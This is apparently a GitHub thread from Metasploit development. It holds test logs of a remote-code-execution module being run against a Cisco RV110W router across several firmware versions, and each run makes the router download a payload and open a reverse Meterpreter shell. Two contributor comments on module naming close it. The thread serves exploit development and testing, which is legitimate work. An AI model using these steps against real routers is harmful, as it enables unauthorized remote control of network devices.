[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/Oeg2hQAjOd
[*] Client 192.168.1.1 (Wget) requested /Oeg2hQAjOd
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:40785) at 2019-07-18 21:25:56 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 1381 created.
Channel 1 created.
nvram get fw_version
1.1.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.2.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 1
target => 1
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/E8DN5bSj5D
[*] Client 192.168.1.1 (Wget) requested /E8DN5bSj5D
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:47864) at 2019-07-18 21:11:05 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 472 created.
Channel 1 created.
nvram get fw_version
1.2.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.10)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.2.0.10
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 2
target => 2
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/4VFaoatLb
[*] Client 192.168.1.1 (Wget) requested /4VFaoatLb
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 9 opened (192.168.1.100:4444 -> 192.168.1.1:35866) at 2019-07-18 20:58:33 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 544 created.
Channel 1 created.
nvram get fw_version
1.2.0.10
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 9 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.4)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 3
target => 3
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/2nlTdxRvlLf
[*] Client 192.168.1.1 (Wget) requested /2nlTdxRvlLf
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 6 opened (192.168.1.100:4444 -> 192.168.1.1:49181) at 2019-07-18 19:26:06 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 520 created.
Channel 1 created.
nvram get fw_version
1.2.1.4
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 6 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 4
target => 4
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/9f1U7su
[*] Client 192.168.1.1 (Wget) requested /9f1U7su
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 4 opened (192.168.1.100:4444 -> 192.168.1.1:60217) at 2019-07-18 19:16:04 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 694 created.
Channel 1 created.
nvram get fw_version
1.2.1.7
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 4 closed.  Reason: User exit
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jul 18, 2019

@QKaiser: I would rename the module (or not if it's too well-known) and add a target per version. It is helpful to name modules as generically as possible while disambiguating. :)

Unfortunately, deprecation is being refactored in #12027. You may deprecate the existing way if you wish. I can refactor that when #12027 lands.

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

QKaiser commented Jul 18, 2019

@wvu-r7 I'll rename the module then, didn't know about the deprecation API :)

I won't open the PR right away as I'm still waiting for an RV215 to replace the qemu offsets with the 'right' ones. I'll check how close #12027 is to land then.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can’t perform that action at this time.